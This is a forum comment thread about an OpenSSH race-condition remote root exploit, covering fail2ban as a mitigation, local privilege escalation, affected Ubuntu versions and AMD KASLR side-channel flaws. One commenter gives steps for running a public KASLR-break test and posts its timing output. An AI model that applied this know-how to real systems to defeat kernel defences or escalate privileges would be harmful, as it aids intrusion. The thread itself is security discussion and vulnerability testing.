> In our experiments, it takes ~10,000 tries on average to win this race conditi...

mmsc · on July 1, 2024

>Mitigate by using fail2ban?

In theory, this could be used (much quicker than the mentioned days/weeks) to get local privilege escalation to root, if you already have some type of shell on the system already. I would assume that fail2ban doesn't block localhost.

udev4096 · on July 1, 2024

How is local privilege escalation relevant here? Fail2ban should be able to block the RCE

mmsc · on July 1, 2024

How is it not?

If fail2ban isn't going to blocklist localhost, then it isn't a mitigation for this vulnerability because RCE implies LPE.

DEADMINCE · on July 1, 2024

People are generally not trying to get root via an SSH RCE over localhost. That's going to be a pretty small sample of people that applies to.

But, sure, in that case fail2ban won't mitigate, but that's pretty damn obviously implied. For 99% of people and situations, it will.

mmsc · on July 1, 2024

>People are generally not trying to get root via an SSH RCE over localhost. That's going to be a pretty small sample of people that applies to

It's going to apply to the amount of servers that an attacker has low-privileged access (think: www-data) and an unpatched sshd. Attackers don't care if it's an RCE or not: if a public sshd exploit can be used on a system with a Linux version without a public Linux LPE, it will be used. Being local also greatly increases the exploitability.

Then consider the networks where port 22 is blocked from the internet but sshd is running in some internal network (or just locally for some reason).

DEADMINCE · on July 1, 2024

> It's going to apply to the amount of servers that an attacker has low-privileged access (think: www-data) and an unpatched sshd.

Right, which is almost none. www-data should be set to noshell 99% of the time.

> or just locally for some reason).

This is all that would be relevant, and this is also very rare.

infotogivenm · on July 1, 2024

Think “illegitimate” access to www-data. It’s very common on linux pentests to need to privesc from some lower-privileged foothold (like a command injection in an httpd cgi script). Most linux servers run openssh. So yes I would expect this turns out to be a useful privesc in practice.

DEADMINCE · on July 1, 2024

> Think “illegitimate” access to www-data.

I get the point.

My point was the example being given is less than 1% of affected cases.

> It’s very common on linux pentests to need to privesc from some lower-privileged foothold

Sure. Been doing pentests for 20+ years :)

> So yes I would expect this turns out to be a useful privesc in practice.

Nah.

infotogivenm · on July 1, 2024

> Nah

I don’t get it then… Do you never end up having to privesc in your pentests on linux systems? No doubt it depends on customer profile but I would guess personally on at least 25% of engagements in Linux environments I have had to find a local path to root.

DEADMINCE · on July 1, 2024

> Do you never end up having to privesc in your pentests on linux systems?

Of course I do.

I'm not saying privsec isn't useful, I'm saying the cases where you will ssh to localhost to get root are very rare.

Maybe you test different environment or something, but on most corporate networks I test the linux machines are dev machines just used for compiling/testing and basically have shared passwords, or they're servers for webapps or something else where normal users most who have a windows machine won't have a shell account.

If there's a server where I only have a local account and I'm trying to get root and it's running an ssh server vulnerable to this attack, of course I'd try it. I just don't expect to be in that situation any time soon, if ever.

mmsc · on July 1, 2024

>I test the linux machines are dev machines just used for compiling/testing and basically have shared passwords, or they're servers for webapps or something else where normal users most who have a windows machine won't have a shell account.

And you don't actually pentest the software which those users on the windows machine are using on the Linux systems? So you find a Jenkins server which can be used to execute Groovy scripts to execute arbitrary commands, the firewall doesn't allow connections through port 22, and it's just a "well, I got access, nothing more to see!"?

DEADMINCE · on July 1, 2024

> And you don't actually pentest the software which those users on the windows machine are using on the Linux systems?

You really love your assumptions, huh?

> it's just a "well, I got access, nothing more to see!"?

I said nothing like that, and besides that, if you were not just focused on arguing for the sake of it, you would see MY point was about the infrequency of the situation you were talking about (and even then your original point seemed to be contrarian in nature more than anything).

mmsc · on July 1, 2024

>www-data should be set to noshell 99% of the time.

Huh? execve(2), of course, lets to execute arbitrary files. No need to spawn a tty at all. https://swisskyrepo.github.io/InternalAllTheThings/cheatshee...

>This is all that would be relevant, and this is also very rare.

Huh? Exploiting an unpatched vulnerability on a server to get access to a user account is.. very rare? That's exactly what lateral movement is about.

DEADMINCE · on July 1, 2024

Instead of taking the time to reply 'huh' multiple times, you should make sure you read what you're replying to.

For example:

> Huh? Exploiting an unpatched vulnerability on a server to get access to a user account is.. very rare?

The 'this' I refer to is very clearly not what you've decided to map it to here. The 'this' I refer to, if you follow the comment chain, refers to a subset of something you said which was relevant to your point - the rest was not.

remram · on July 3, 2024

You could have also said "99% of people don't let their login timeout and hit the SIGALRM"... People don't usually use an SSH RCE because there usually isn't an SSH RCE. If there is, why wouldn't they?

It doesn't matter if 99% of the situations you can think of are not problematic. If 1% is feasible and the attackers know about it, it's an attack vector.

sgt · on July 1, 2024

Confirmed - fail2ban doesn't block localhost.

ulrikrasmussen · on July 1, 2024

Where do you see that Ubuntu isn't affected?

rs_rs_rs_rs_rs · on July 1, 2024

>Side note: we discovered that Ubuntu 24.04 does not re-randomize the ASLR of its sshd children (it is randomized only once, at boot time); we tracked this down to the patch below, which turns off sshd's rexec_flag. This is generally a bad idea, but in the particular case of this signal handler race condition, it prevents sshd from being exploitable: the syslog() inside the SIGALRM handler does not call any of the malloc functions, because it is never the very first call to syslog().

No mention on 22.04 yet.

skeetmtp · on July 1, 2024

Ubuntu released patches though

https://ubuntu.com/security/notices/USN-6859-1

nubinetwork · on July 1, 2024

Ubuntu has pushed an updated openssh.

djmdjm · on July 1, 2024

Ubuntu isn't affected _by this exploit_

jgalt212 · on July 1, 2024

as opposed to the other exploits not being discussed.

simonjgreen · on July 1, 2024

For servers you have control over, as an emergency bandaid, sure. Assumes you are not on an embedded system though like a router.

letters90 · on July 1, 2024

I didn't consider embedded, probably the biggest target for this.

markhahn · on July 2, 2024

fail2ban just means an attacker would need to use many source IPs, not hard.

paulmd · on July 1, 2024

> Ultimately, it takes ~6-8 hours on average to obtain a remote root shell, because we can only guess the glibc's address correctly half of the time (because of ASLR).

AMD to the rescue - fortunately they decided to leave the take-a-way and prefetch-type-3 vulnerability unpatched, and continue to recommend that the KPTI mitigations be disabled by default due to performance costs. This breaks ASLR on all these systems, so these systems can be exploited in a much shorter time ;)

AMD’s handling of these issues is WONTFIX, despite (contrary to their assertion) the latter even providing actual kernel data leakage at a higher rate than meltdown itself…

(This one they’ve outright pulled down their security bulletin on) https://pcper.com/2020/03/amd-comments-on-take-a-way-vulnera...

(This one remains unpatched in the third variant with prefetch+TLB) https://www.amd.com/en/resources/product-security/bulletin/a...

edit: there is a third now building on the first one with an unpatched vulnerabilities in all zen1/zen2 as well… so this one is WONTFIX too it seems, like most of the defects TU Graz has turned up.

https://www.tomshardware.com/news/amd-cachewarp-vulnerabilit...

Seriously I don’t know why the community just tolerates these defenses being known-broken on the most popular brand of CPUs within the enthusiast market, while allowing them to knowingly disable the defense that’s already implemented that would prevent this leakage. Is defense-in-depth not a thing anymore?

Nobody in the world would ever tell you to explicitly turn off ASLR on an intel system that is exposed to untrusted attackers… yet that’s exactly the spec AMD continues to recommend and everyone goes along without a peep. It’s literally a kernel option that is already running and tested and hardens you against ASLR leakage.

The “it’s only metadata” is so tired. Metadata is more important than regular data, in many cases. We kill people, convict people, control all our security and access control via metadata. Like yeah it’s just your ASLR layouts leaking, what’s the worst that could happen? And I mean real data goes too in several of these exploits too, but that’s not a big deal either… not like those ssh keys are important, right?

JackSlateur · on July 1, 2024

What are you talking about ? My early-2022 ryzen 5625U shows:

  Vulnerabilities:          
    Gather data sampling:   Not affected
    Itlb multihit:          Not affected
    L1tf:                   Not affected
    Mds:                    Not affected
    Meltdown:               Not affected
    Mmio stale data:        Not affected
    Reg file data sampling: Not affected
    Retbleed:               Not affected
    Spec rstack overflow:   Vulnerable: Safe RET, no microcode
    Spec store bypass:      Mitigation; Speculative Store Bypass disabled via prctl
    Spectre v1:             Mitigation; usercopy/swapgs barriers and __user pointer sanitization
    Spectre v2:             Mitigation; Retpolines; IBPB conditional; IBRS_FW; STIBP always-on; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected
    Srbds:                  Not affected
    Tsx async abort:        Not affected

Only regular stuff

SubzeroCarnage · on July 1, 2024

KPTI won't be default enabled on Linux on AMD CPUs is the issue here.

Yet it provides valuable separation between kernel and userspace address ranges.

iirc the predecessor to KPTI was made before these hw flaws were announced as a general enhancement to ASLR.

AMD aside, Spectre V2 isn't even default mitigated for userspace across the board, you must specify spectre_v2=on for userspace to be protected.

https://www.kernel.org/doc/html/latest/admin-guide/kernel-pa...

paulmd · on July 1, 2024

> KPTI won't be default enabled on Linux on AMD CPUs is the issue here. Yet it provides valuable separation between kernel and userspace address ranges.

AMD's security bulletin is actually incredibly weaselly and in fact quietly acknowledges KPTI as the reason further mitigation is not necessary, and then goes on to recommend that KPTI remain disabled anyway.

https://www.amd.com/en/resources/product-security/bulletin/a...

> The attacks discussed in the paper do not directly leak data across address space boundaries. As a result, AMD is not recommending any mitigations at this time.

That's literally the entire bulletin, other than naming the author and recommending you follow security best-practices. Two sentences, one of which is "no mitigations required at this time", for an exploit which is described by the author (who is also a named author of the Meltdown paper!) as "worse than Meltdown", in the most popular brand of server processor.

Like it's all very carefully worded to avoid acknowledging the CVE in any way, but to also avoid saying anything that's technically false. If you do not enable KPTI then there is no address space boundary, and leakage from the kernel can occur. And specifically that leakage is page-table layouts - which AMD considers "only metadata" and therefore not important (not real data!).

But it is a building block which amplifies all these other attacks, including Specter itself. Specter was tested in the paper itself and - contrary to AMD's statement (one of the actual falsehoods they make despite their weaseling) - does result in actual leakage of kernel data and not just metadata (the author notes that this is a more severe leak than meltdown itself). And leaking metadata is bad enough by itself - like many kinds of metadata, the page-table layouts are probably more interesting (per byte exfiltrated) than the actual data itself!

AMD's interest is in shoving it under the rug as quietly as possible - the solution is flushing the caches every time you enter/leave kernel space, just like with Meltdown. That's what KPTI is/does, you flush caches to isolate the pages. And AMD has leaned much more heavily on large last-level caches than Intel has, so this hurts correspondingly more.

But I don't know why the kernel team is playing along with this. The sibling commenter is right in the sense that this is not something that is being surfaced to users to let them know they are vulnerable, and that the kernel team continues to follow the AMD recommendation of insecure-by-default and letting the issue go quietly under the rug at the expense of their customers' security. This undercuts something that the kernel team has put significant engineering effort into mitigating - not as important as AMD cheating on benchmarks with an insecure configuration I guess.

There has always been a weird sickly affection for AMD in the enthusiast community, and you can see it every time there's an AMD vulnerability. When the AMD vulns really started to flow a couple years ago, there was basically a collective shrug and we just decided to ignore them instead of mitigating. So much for "these vulnerabilities only exist because [the vendor] decided to cut corners in the name of performance!". Like that's explicitly the decision AMD has made with their customers' security. And everyone's fine with it, same weird sickly affection for AMD as ever among the enthusiast community. This is a billion-dollar company cutting corners on their customers' security so they can win benchmarks. It's bad. It shouldn't need to be said, but it does.

I very much feel that - even given that people's interest or concern about these exploits is fading over time - that even today (let alone a couple years ago) Intel certainly would not have received the same level of deference if they just said that a huge, performance-sapping patch was "not really necessary" and that everyone should just run their systems in an insecure configuration so that benchmarks weren't unduly harmed. It's a weird thing people have where they need to cover all the bases before they will acknowledge the slightest fault or problem or misbehavior with this specific corporation. Same as the sibling who disputed all this because Linux said he was secure - yeah, the kernel team doesn't seem to care about that, but as I demonstrated there is still a visible timing thing even on current BIOS/OS combinations.

Same damn thing with Ryzenfall too - despite the skulduggery around Monarch, CTS Labs actually did find a very serious vuln (actually 3-4 very serious exploits that let them break out of guest/jailbreak PSP and bypass AMD's UEFI signing and achieve persistence, and it's funny to look back at the people whining that it doesn't deserve a 9.0 severity or whatever. Shockingly, MITRE doesn't give those out for no reason, and AMD doesn't patch "root access lets you do root things" for no reason either.

https://www.youtube.com/watch?v=QuqefIZrRWc

I get why AMD is doing it. I don't get why the kernel team plays along. It's unintentionally a really good question from the sibling: why isn't the kernel team applying the standards uniformly? Here's A Modest Security Proposal: if we just don't care about this class of exploit anymore, and KASLR isn't going to be a meaningful part of a defense-in-depth, shouldn't it be disabled for everyone at this point? Is that a good idea?

JackSlateur · on July 2, 2024

But is this not the same thing on intel CPU ? I believe "new" intel CPU are, too, unaffected by meltdown, and so kpti will be disabled there by default.

paulmd · on July 3, 2024

if there are no errata leading to (FG)KASLR violations, then no problem disabling KPTI as a general security boundary. The thing I am saying is that vendors do not agree on processors providing ASLR timing attack protection as a defined security boundary in all situations.

you need to either implement processor-level ASLR protections (and probably these guarantees fade over time!) or kpti/flush your shit when you move between address spaces. Or there needs to be an understanding from the kernel team that they need to develop under the page allocation model that attackers can see your allocation patterns after initial breaches. like let's say they breach your PRNG key. Should there be additional compartmentalization after that? Multiple keys at multiple security boundaries / within the stack more generally to increase penetration time across security boundaries?

seemingly the expectation is one or the other though, because ASLR security is being treated as a security boundary.

I also very much feel that at this point KPTI is just a generalized good defense in depth. If that's the defense that's going to be deployed after your shit falls through... let's just flush it preemptively, right? That's not the current practice but should it be?

SubzeroCarnage · on July 1, 2024

Also if you don't have a bios update available for that newer microcode, give my real-ucode package a try: https://github.com/divestedcg/real-ucode

The linux-firmware repo does not provide AMD microcode updates to consumer platforms unlike Intel.

paulmd · on July 1, 2024

these are the tests you need to run: https://github.com/amdprefetch/amd-prefetch-attacks/blob/mas...

you probably want to do `export WITH_TLB_EVICT=1` before you make, then run ./kaslr. The power stuff is patched (by removing the RAPL power interface) but there is still timing differences visible on my 5700G and the WITH_TLB_EVICT makes this fairly obvious/consistent:

https://pastebin.com/1n0QbHTH

```csv

452,0xffffffffb8000000,92,82,220

453,0xffffffffb8200000,94,82,835

454,0xffffffffb8400000,110,94,487

455,0xffffffffb8600000,83,75,114

456,0xffffffffb8800000,83,75,131

457,0xffffffffb8a00000,109,92,484

458,0xffffffffb8c00000,92,82,172

459,0xffffffffb8e00000,110,94,499

460,0xffffffffb9000000,92,82,155

```

those timing differences are the presence/nonpresence of kernel pages in the TLB, those are the KASLR pages, they’re slower when the TLB eviction happens because of the extra bookkeeping.

then we have the stack protector canary on the last couple pages of course:

```csv

512,0xffffffffbf800000,91,82,155

513,0xffffffffbfa00000,92,82,147

514,0xffffffffbfc00000,92,82,151

515,0xffffffffbfe00000,91,82,137

516,0xffffffffc0000000,112,94,598

517,0xffffffffc0200000,110,94,544

518,0xffffffffc0400000,110,94,260

519,0xffffffffc0600000,110,94,638

```

edit: the 4 pages at the end of the memory space are very consistent between tests and across reboots, and the higher lookup time goes away if you set the kernel boot option "pti=on" manually at startup, that’s the insecure behavior as described in the paper.

log with pti=on kernel option: https://pastebin.com/GK5KfsYd

```csv

513,0xffffffffbfa00000,92,82,147

514,0xffffffffbfc00000,92,82,123

515,0xffffffffbfe00000,92,82,141

516,0xffffffffc0000000,91,82,134

517,0xffffffffc0200000,91,82,140

518,0xffffffffc0400000,91,82,151

519,0xffffffffc0600000,91,82,141

```

environment: ubuntu 22.04.4 live-usb, 5700G, b550i aorus pro ax latest bios